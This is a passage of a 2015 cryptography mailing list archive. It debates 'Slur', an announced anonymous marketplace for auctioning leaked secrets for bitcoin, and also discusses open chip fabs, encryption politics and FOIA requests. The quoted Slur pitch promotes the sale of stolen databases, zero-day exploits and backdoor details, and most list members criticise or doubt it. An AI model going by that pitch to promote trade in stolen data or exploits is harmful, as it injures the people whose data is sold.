Juan, your voice is needed so much more now than ever!

Where this goes will be interesting to say the least.

On 7/31/15, Nick Econopouly wrote: > Paste for those who don't want to load the webpage: > > > http://slur.io/ > Slur: You're going to hate it. > > "Slur is an open source, decentralized and anonymous marketplace for the > selling of secret information in exchange for bitcoin.
Slur is written > in C and operates over the Tor network with bitcoin transactions through > libbitcoin. Both buyers and sellers are fully anonymous and there are no > restrictions on the data that is auctioned. There is no charge to buy or > sell on the Slur marketplace except in the case of a dispute, where a > token sum is paid to volunteers. - See more at: > http://slur.io/#sthash.OsHtOC5o.dpuf" > > "How does it work ? > > > Sellers encrypt, upload and then list their data on the digital > market with the ease a user might list an item on eBay. They do so > with full anonymity and there are no restrictions on the content of > the data. > > Exclusive bidders attempt to purchase the data for their own use > and / or prevent other parties from acquiring a copy. Should an > exclusive bidder win the auction they alone will receive the > decryption keys. The same data cannot be auctioned a second time > on the Slur marketplace. > > Crowd bidders pool their funds into a single bid. Should they > win the auction the network will release the decryption keys > to all users on the Slur marketplace and the information will > therefore become public. > > Arbitrators are randomly selected users who agree to weigh > in on a dispute should the winner of an auction claim that > the decrypted contents do not match the sellers > description. > > Public key cryptography ensures the data being sold can > only be decrypted by the winner of the auction. > - See more at: http://slur.io/#sthash.OsHtOC5o.dpuf" > > > "Implications: > If correctly implemented this platform will have a profound and lasting > effect on our society. > > An unregulated free market for information would redefine the net worth > of every person as their material assets would in the future be weighed > against the market value of their secrets. > > As damaging as Slur can be to individuals it is considerably more so for > groups > > It's estimated that 5% of the general population are psychopaths. 
> Introducing financial incentive in an anonymous framework will produce a > greater yield of leaked information than from say the ideology that > drove patriots like Edward Snowden. For every idealist willing to > selflessly sacrifice their freedom, assets and even risk their lives for > a greater good, there are 1000 psychopaths willing to anonymously sell > out their peers for material gain. > > Organizations of every type; governments, corporations and the military > are in the unfortunate predicament of having both a great deal of liquid > assets and a large number of secrets to protect - accessible by numerous > disgruntled or psychopathic personnel. When Slur becomes ubiquitous it > will bleed organizations secrets and funds. > > The Slur marketplace will sharply increase demand for bitcoin from those > parties attempting to purchase previously inaccessible secret > information and organizations scrambling to suppress damaging leaks from > inside their own ranks or security breaches. > > The Slur market is WikiLeaks 2.0. An incalculable resource for public > knowledge and unfiltered access to the truth. Except that in the future > journalists will need to compensate whistle blowers for the extreme > risks they take. > > The types of information we expect to see on the Slur marketplace ; > > Trade secrets. > > Designs for every type of consumer product. > > The source code for proprietary operating systems and high end > CAD software. > > Zero day exploits. For the market defined value rather than > a price determined by the corporations under the guise of a > bounty with the veiled threat of legal action should the > researcher choose to sell elsewhere. > > The details of backdoors covertly installed inside > industrial and consumer hardware and software. > > Stolen databases. Corporations will no longer be able > to get away with an apology when they fail to secure > their customers confidential data. They will have to > pay the market value to suppress it. 
> > Proof of tax evasion from disgruntled or underpaid > employees. Both the IRS and the public have an > interest in that information and the corporations > will have to bid to suppress it - a very > quantifiable and predictable payoff for the seller. > > Military intelligence relevant to real-time > conflicts. > > Aerospace and defense designs. > > Evidence relevant to ongoing trials. > > Unflattering celebrity photos and > videos. > > The complete databases of social > media sites like facebook. > > Proof of government corruption. > Close to an election. - See more > at: > http://slur.io/#sthash.OsHtOC5o.dpuf" > > > The site appeals for donations and has a crossed out sentence saying > production versions will be available in july 2015. > > Thoughts? > > -nick > From Rayzer at riseup.net Fri Jul 31 09:48:48 2015 From: Rayzer at riseup.net (Razer) Date: Fri, 31 Jul 2015 09:48:48 -0700 Subject: slur: you're going to hate it In-Reply-To: References: <20150731011530.GA5234@android> Message-ID: <55BBA6F0.3020209@riseup.net> On 07/30/2015 11:23 PM, Zenaan Harkness wrote: > I have serious problems with this - leak by economic purchasing power? > Where's the principle in that? What could possibly go wrong? > > This allows the mega wealthy to pay for the protection of their data. > If such a market actually gets going, if nothing else it's a turbo > charged economic greasing of economic information blackmail. > > Please people, think before you support such a things. > > Obviously the oligarchies around the planet will love such a thing > (they print the money anyway, so a few dollars is pocket change - a > pittance to them anyway). > > I guess we had to see such reactions to Snowden and his ilk. > > Juan, your voice is needed so much more now than ever! > > Where this goes will be interesting to say the least. > > The 'donate' hash said something about 'counterbalancing the class war' and I immediately thought, 'in whose favor?'. 
But I'm one who doesn't believe mythical currencies like cash and bitcoins EVER 'stops pigs' or 'serves people'. RR "It's not the world it's the people." ~War, The World Is A Ghetto -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From drwho at virtadpt.net Fri Jul 31 10:51:13 2015 From: drwho at virtadpt.net (The Doctor) Date: Fri, 31 Jul 2015 10:51:13 -0700 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55BA5920.5000903@virtadpt.net> <55BAA120.2050901@virtadpt.net> <55BAA690.1070801@openmailbox.org> Message-ID: <55BBB591.6060005@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/30/2015 04:43 PM, Zenaan Harkness wrote: > 1) Program full FLOSS stack for circuit/chip dev: # some starts: > apt-cache search circuit apt-cache search electron > > 2) Start with one of the FLOSS CPUs, eg SPARC2, and divide and > conquer its analysis audit. That's been mentioned here several times. Then someone else chimes in with the injection of boobytrapped packages to ensure that designs are automagickally tampered with or boobytrapped compilers (nevermind that we have a workable way of detecting and mitigating the attack (try it, it works!)). Then someone else chimes in with "Well, we can't even trust the FPGAs or the gate synthesis software for the same reason." This is yet another iteration of the same loop on this mailing list. It would be killfile-able if some of the basic terms didn't change between iterations. I suppose what I'm bitching about (and I've probably just faceplanted by stepping into that particular pothole - it's my turn, I guess) is that there seems to be no part of the threat model where risk is acceptable.
I mean, going all the way back to hand-wired electromechanical processors just to be able to bootstrap back to silicon and losing 20-30 years of technical advancement? Somewhere, we went way off course. There is a saying: "Perfect is the enemy of working." I think that's where we as a group have lost our way. The threats are known. The risks are known. Let's act. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Holy crap! What have I gotten myself into!?" --Adam Savage From nickeconopouly at gmail.com Fri Jul 31 11:23:01 2015 From: nickeconopouly at gmail.com (Nick Econopouly) Date: Fri, 31 Jul 2015 14:23:01 -0400 Subject: [nickeconopouly@gmail.com: Re: slur: you're going to hate it] Message-ID: <20150731182300.GD5278@android> ----- Forwarded message from Nick Econopouly ----- > Date: Fri, 31 Jul 2015 14:21:44 -0400 > From: Nick Econopouly > To: Zenaan Harkness > Subject: Re: slur: you're going to hate it > User-Agent: Mutt/1.5.23+89 (0255b37be491) (2014-03-12) > > On 07/31, Zenaan Harkness wrote: > > I have serious problems with this - leak by economic purchasing power?
> > Where's the principle in that? What could possibly go wrong? > exactly. More like what could go right > > > > This allows the mega wealthy to pay for the protection of their data. > > If such a market actually gets going, if nothing else it's a turbo > > charged economic greasing of economic information blackmail. > Well, this assumes that the leakers don't royally rip off the wealthy > before releasing the data anyway. > > > > Please people, think before you support such a things. > > > > Obviously the oligarchies around the planet will love such a thing > > (they print the money anyway, so a few dollars is pocket change - a > > pittance to them anyway). > > I would be really surprised if Slur followed through and the oligarchies > loved it. What if people release info for free? or accept donations? > Sure, it's based on the pseudo-science of economics, it's home turf, > but somehow I doubt that the USA would take a liking to a new leaking platform. > > What would be interesting to see is governments(perhaps anonymously) > spending huge amounts to shame each other > > regards, > nick ----- End forwarded message ----- From nickeconopouly at gmail.com Fri Jul 31 11:23:29 2015 From: nickeconopouly at gmail.com (Nick Econopouly) Date: Fri, 31 Jul 2015 14:23:29 -0400 Subject: [nickeconopouly@gmail.com: Re: slur: you're going to hate it] Message-ID: <20150731182329.GE5278@android> ----- Forwarded message from Nick Econopouly ----- > Date: Fri, 31 Jul 2015 14:04:51 -0400 > From: Nick Econopouly > To: Razer > Subject: Re: slur: you're going to hate it > User-Agent: Mutt/1.5.23+89 (0255b37be491) (2014-03-12) > > On 07/31, Razer wrote: > > > > > > On 07/30/2015 11:23 PM, Zenaan Harkness wrote: > > > I have serious problems with this - leak by economic purchasing power? > > > Where's the principle in that? What could possibly go wrong? > > > > > > This allows the mega wealthy to pay for the protection of their data. 
> > > If such a market actually gets going, if nothing else it's a turbo > > > charged economic greasing of economic information blackmail. > > > > > > Please people, think before you support such a things. > > > > > > Obviously the oligarchies around the planet will love such a thing > > > (they print the money anyway, so a few dollars is pocket change - a > > > pittance to them anyway). > > > > > > I guess we had to see such reactions to Snowden and his ilk. > > > > > > Juan, your voice is needed so much more now than ever! > > > > > > Where this goes will be interesting to say the least. > > > > > > > > > > The 'donate' hash said something about 'counterbalancing the class war' > > and I immediately thought, 'in whose favor?'. But I'm one who doesn't > > believe mythical currencies like cash and bitcoins EVER 'stops pigs' or > > 'serves people'. > Weird, right? > "Using the enemy's tool against him" works much better when the enemy > isn't the #1 owner, printer, miner of the tool > > Although I have to admit, copyleft is an example of that concept applied > correctly. > > -nick ----- End forwarded message ----- From nickeconopouly at gmail.com Fri Jul 31 11:23:36 2015 From: nickeconopouly at gmail.com (Nick Econopouly) Date: Fri, 31 Jul 2015 14:23:36 -0400 Subject: [nickeconopouly@gmail.com: Re: slur: you're going to hate it] Message-ID: <20150731182336.GF5278@android> ----- Forwarded message from Nick Econopouly ----- > Date: Fri, 31 Jul 2015 13:55:25 -0400 > From: Nick Econopouly > To: "Shawn K. Quinn" > Subject: Re: slur: you're going to hate it > User-Agent: Mutt/1.5.23+89 (0255b37be491) (2014-03-12) > > On 07/30, Shawn K. Quinn wrote: > > On Thu, 2015-07-30 at 21:15 -0400, Nick Econopouly wrote: > > > Paste for those who don't want to load the webpage: > > > > > > > > > http://slur.io/ > > > Slur: You're going to hate it. 
> > > > > > "Slur is an open source, decentralized and anonymous marketplace for the > > > selling of secret information in exchange for bitcoin. Slur is written > > > in C and operates over the Tor network with bitcoin transactions through > > > libbitcoin. Both buyers and sellers are fully anonymous and there are no > > > restrictions on the data that is auctioned. There is no charge to buy or > > > sell on the Slur marketplace except in the case of a dispute, where a > > > token sum is paid to volunteers. - See more at: > > > http://slur.io/#sthash.OsHtOC5o.dpuf" > > [...] > > > > This is either going to be very good or very bad. Only time will tell > > which way this goes. > I tend to agree. It has potential to incentize the release of more > information, or create incentive to hoard information and release it > based on the market instead of what is right or wrong. > > In general though I think the project won't be moving forward, for > several reasons > > The service offered by "slur" could easily exist on many DNMs right now > anyway-- I know there are sites where you can buy credit cards, etc. > Does agora sell digital goods? > > The website makes some fantastic claims as well. For instance the claim > that information can not be sold twice on the slur marketplace, or that > someone could really "prevent other parties from acquiring a copy" by > buying it themselves-- Slur is making the mistake of treating IP like > actual tangible property that can't be copied. 
> > Also, the functionality of Slur would rely on Arbitrators judging > disputes fairly instead of in some other interest > > But there really should be a better leaking platform than just sending > it to an institution (guardian,wikileaks) or hosting it somewhere on the > darknet and hoping people find it > > -nick > ----- End forwarded message ----- From grarpamp at gmail.com Fri Jul 31 14:05:16 2015 From: grarpamp at gmail.com (grarpamp) Date: Fri, 31 Jul 2015 17:05:16 -0400 Subject: Open Fabs In-Reply-To: <145357920.6673577.1438372406644.JavaMail.yahoo@mail.yahoo.com> References: <55BBB591.6060005@virtadpt.net> <145357920.6673577.1438372406644.JavaMail.yahoo@mail.yahoo.com> Message-ID: On Fri, Jul 31, 2015 at 3:53 PM, jim bell wrote: > From: The Doctor > >>I suppose what I'm bitching about (and I've probably just faceplanted >>by stepping into that particular pothole - it's my turn, I guess) is that >>there seems to be no part of the threat model where risk is >>acceptible. I mean, going all the way back to hand-wired >>electromechanical processors just to be able to bootstrap back to >>silicon and losing 20-30 years of technical advancement? It's a fast rebuild using trusted principles, there are no tech discoveries needed, no loss of any tech. Yes you have to learn to apply trusted principles, that will take time. And keep up with whatever new tech comes after the time you start, which is normal. So for a while you just have to work harder, faster, better. That's standard practice and nothing new for a startup and people in them. >>Somewhere, we went way off course. There is a saying: "Perfect is the >>enemy of working." I think that's where we as a group have lost our way. > >>The threats are known. The risks are known. Let's act. > > I agree with that. I think it's better that we get 50% of the population to > use encrypted phones, where the encryption isn't truly known to be perfect, > than to get 1% of the population to use perfect encryption. 
Verifying the > last little bit of doubt is going to cost a rather large amount of money. > Raising the demand for crypto phones to 50% represents a huge market, which > will be satisfied, and the profits for that market will pay for the next > generation of closer-to-perfect phones.

Ok fine, let's say you don't care to trust your chip designing and printing hardware, and you opt to totally skip doing anything to rebuild or validate those parts of the trust chain [1]. But you still do want an open hardware crypto phone for yourself and the masses, which would you prefer to do:

a) wait for some bigcorp like MS/Nokia Apple HTC to convincingly say and show an open hardware crypto design?
b) send your own open hardware design to global foundries?
c) send your own open hardware design to a community owned and operated open fab (still being subject to your choice in [1] above)?

I suggest investing in (c) now will bring more and more community and other runs through it such that you can invest in [1] above later. You might even have to bank profit from (b) to get to (c). But anything involving (a) is not "Let's act", unless you think your pleading and pressure (which is all you can do there) will be fruitful [2]. So at minimum you best start acting on (b) or (c). Right?

[2] Still waiting on open video cards and drivers eh, how many decades of "raising the demand" has that been? Lol. Oh, but Apple did add some closed crypto'ey fingerprint'ey passphrase'ey thing to their phone, so maybe that was pressure, and trust'ey enough, and we can all "act" by throwing dollars at that instead of ever having our own (b/c/[1]), and just have faith instead.

I'm tired of (a), and it's boring, and if not evil at least not really aligned to your interests. If you want something done, carry a big stick, or do it yourself until you have one.
From grarpamp at gmail.com Fri Jul 31 14:45:11 2015 From: grarpamp at gmail.com (grarpamp) Date: Fri, 31 Jul 2015 17:45:11 -0400 Subject: Delete and migrate your junk off GoogleCode by August 25 !!! Message-ID: It's going away, so if you've got stuff there you want to delete and manage without interacting with their humans and policy/archive wonks, do it now!!! http://google-opensource.blogspot.com/2015/03/farewell-to-google-code.html https://code.google.com/p/support/wiki/ReadOnlyTransition Sourceforge has been acting weird too, but you knew that. From grarpamp at gmail.com Fri Jul 31 16:52:52 2015 From: grarpamp at gmail.com (grarpamp) Date: Fri, 31 Jul 2015 19:52:52 -0400 Subject: Obama heads level "material support" at crypto purveyors Message-ID: https://firstlook.org/theintercept/2015/07/30/obama-administration-war-apple-google-just-got-uglier/ The Obama administration’s central strategy against strong encryption seems to be waging war on the companies that are providing and popularizing it: most notably Apple and Google. The intimidation campaign got a boost Thursday when a blog that frequently promotes the interests of the national security establishment raised the prospect of Apple being found liable for providing material support to a terrorist. From jdb10987 at yahoo.com Fri Jul 31 12:53:26 2015 From: jdb10987 at yahoo.com (jim bell) Date: Fri, 31 Jul 2015 19:53:26 +0000 (UTC) Subject: Open Fabs In-Reply-To: <55BBB591.6060005@virtadpt.net> References: <55BBB591.6060005@virtadpt.net> Message-ID: <145357920.6673577.1438372406644.JavaMail.yahoo@mail.yahoo.com> From: The Doctor >I suppose what I'm bitching about (and I've probably just faceplanted >by stepping into that particular pothole - it's my turn, I guess) is that >there seems to be no part of the threat model where risk is >acceptible.  
I mean, going all the way back to hand-wired >electromechanical processors just to be able to bootstrap back to >silicon and losing 20-30 years of technical advancement? >Somewhere, we went way off course.  There is a saying: "Perfect is the >enemy of working."  I think that's where we as a group have lost our way. >The threats are known.  The risks are known.  Let's act. I agree with that.  I think it's better that we get 50% of the population to use encrypted phones, where the encryption isn't truly known to be perfect, than to get 1% of the population to use perfect encryption.  Verifying the last little bit of doubt is going to cost a rather large amount of money.  Raising the demand for crypto phones to 50% represents a huge market, which will be satisfied, and the profits for that market will pay for the next generation of closer-to-perfect phones.              Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2626 bytes Desc: not available URL: From coderman at gmail.com Fri Jul 31 20:18:49 2015 From: coderman at gmail.com (coderman) Date: Fri, 31 Jul 2015 20:18:49 -0700 Subject: FOIA/PA Message-ID: hey Jim, you know what'd be fun? a FOIA/PA request to FBI for your documents. :) if you're so inclined, see https://www.muckrock.com/foi/united-states-of-america-10/privacyactdirect-19921/ for example wording of interest. 
best regards, codermange From zen at freedbms.net Fri Jul 31 17:44:45 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 1 Aug 2015 00:44:45 +0000 Subject: Obama heads level "material support" at crypto purveyors In-Reply-To: References: Message-ID: On 7/31/15, grarpamp wrote: > https://firstlook.org/theintercept/2015/07/30/obama-administration-war-apple-google-just-got-uglier/ > > The Obama administration’s central strategy against strong encryption > seems to be waging war on the companies that are providing and > popularizing it: most notably Apple and Google. > The intimidation campaign got a boost Thursday when a blog that > frequently promotes the interests of the national security > establishment raised the prospect of Apple being found liable for > providing material support to a terrorist. Guess they should stop selling to USAGov then. Can't be seen to be supportin derowrists. From carimachet at gmail.com Fri Jul 31 15:56:12 2015 From: carimachet at gmail.com (Cari Machet) Date: Sat, 1 Aug 2015 01:56:12 +0300 Subject: Open Fabs In-Reply-To: <55B94E52.2050709@pilobilus.net> References: <55B94E52.2050709@pilobilus.net> Message-ID: On Thu, Jul 30, 2015 at 1:06 AM, Steve Kinney wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > I do see problems with scaling DYI chip projects up to commercial > production numbers, and down in scale to achieve fast, high > capacity performance. That's why I am much more interested in the > prospects of a manufacturing process built for radical > transparency, using "commercial best practice" technology at > conventional production facilities. > > IMO the same kind of radical transparency should apply to all > industrial processes that pose large potential hazards to public > health & safety, i.e. nuclear power stations, transgenic > agriculture, etc. 
> > :o) > > i have been thinking about this and i was thinking a lot about actual nuclear bomb sites being added to the list of 'hazard to public' and i was like - not possible to give the public any kind of access to such horrors but then its already in play ... NATOish people sold the design of the bomb to pakistan and israel long ago so maybe actually if more people were involved in the process it would be in safer hands and there would be less proliferation as it seems to be the modus operandi that there be more bombs to counter best film ever points in the direction of nano/bio tech possibilities le jette with the murder of species... can we have the components make themselves and self destruct when in danger? -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3043 bytes Desc: not available URL: From jdb10987 at yahoo.com Fri Jul 31 23:46:23 2015 From: jdb10987 at yahoo.com (jim bell) Date: Sat, 1 Aug 2015 06:46:23 +0000 (UTC) Subject: FOIA/PA In-Reply-To: References: Message-ID: <242915876.53291.1438411583710.JavaMail.yahoo@mail.yahoo.com> Okay, what brought this on?  And which documents did you have in mind?            Jim Bell From: coderman To: jim bell Cc: "cypherpunks at cpunks.org" Sent: Friday, July 31, 2015 8:18 PM Subject: FOIA/PA hey Jim, you know what'd be fun? a FOIA/PA request to FBI for your documents. 
:)

if you're so inclined, see https://www.muckrock.com/foi/united-states-of-america-10/privacyactdirect-19921/ for example wording of interest.

best regards,
codermange

From carimachet at gmail.com Fri Jul 31 21:47:41 2015
From: carimachet at gmail.com (Cari Machet)
Date: Sat, 1 Aug 2015 07:47:41 +0300
Subject: FOIA/PA
In-Reply-To:
References:
Message-ID:

ooooooooo jim i will help you do it

On Aug 1, 2015 6:24 AM, "coderman" wrote:
> hey Jim,
>
> you know what'd be fun? a FOIA/PA request to FBI for your documents. :)
>
> if you're so inclined,
> see
> https://www.muckrock.com/foi/united-states-of-america-10/privacyactdirect-19921/
> for example wording of interest.
>
>
> best regards,
> codermange
>

From carimachet at gmail.com Fri Jul 31 21:53:03 2015
From: carimachet at gmail.com (Cari Machet)
Date: Sat, 1 Aug 2015 07:53:03 +0300
Subject: Open Fabs
In-Reply-To:
References: <55B94E52.2050709@pilobilus.net>
Message-ID:

and what were we just talking
http://www.dailydot.com/politics/industrial-ethernet-switches-ies-vulnerabilities/

On Sat, Aug 1, 2015 at 1:56 AM, Cari Machet wrote:
>
>
> On Thu, Jul 30, 2015 at 1:06 AM, Steve Kinney wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>>
>> I do see problems with scaling DIY chip projects up to commercial
>> production numbers, and down in scale to achieve fast, high
>> capacity performance. That's why I am much more interested in the
>> prospects of a manufacturing process built for radical
>> transparency, using "commercial best practice" technology at
>> conventional production facilities.
>>
>> IMO the same kind of radical transparency should apply to all
>> industrial processes that pose large potential hazards to public
>> health & safety, i.e. nuclear power stations, transgenic
>> agriculture, etc.
>>
>> :o)
>>
>>
>
>
> i have been thinking about this and i was thinking a lot about actual
> nuclear bomb sites being added to the list
> of 'hazard to public' and i was like - not possible to give the public any
> kind of access to such horrors but then
> its already in play ... NATOish people sold the design of the bomb to
> pakistan and israel long ago so maybe
> actually if more people were involved in the process it would be in safer
> hands and there would be less
> proliferation as it seems to be the modus operandi that there be more
> bombs to counter
>
> best film ever points in the direction of nano/bio tech possibilities le
> jette with the murder of species... can we have the components make
> themselves and self destruct when in danger?
>
>
>
> --
> Cari Machet
> NYC 646-436-7795
> carimachet at gmail.com
> AIM carismachet
> Syria +963-099 277 3243
> Amman +962 077 636 9407
> Berlin +49 152 11779219
> Reykjavik +354 894 8650
> Twitter: @carimachet
>
> 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187
>
> Ruh-roh, this is now necessary: This email is intended only for the
> addressee(s) and may contain confidential information. If you are not the
> intended recipient, you are hereby notified that any use of this
> information, dissemination, distribution, or copying of this email without
> permission is strictly prohibited.
>
>
>

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information.
If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.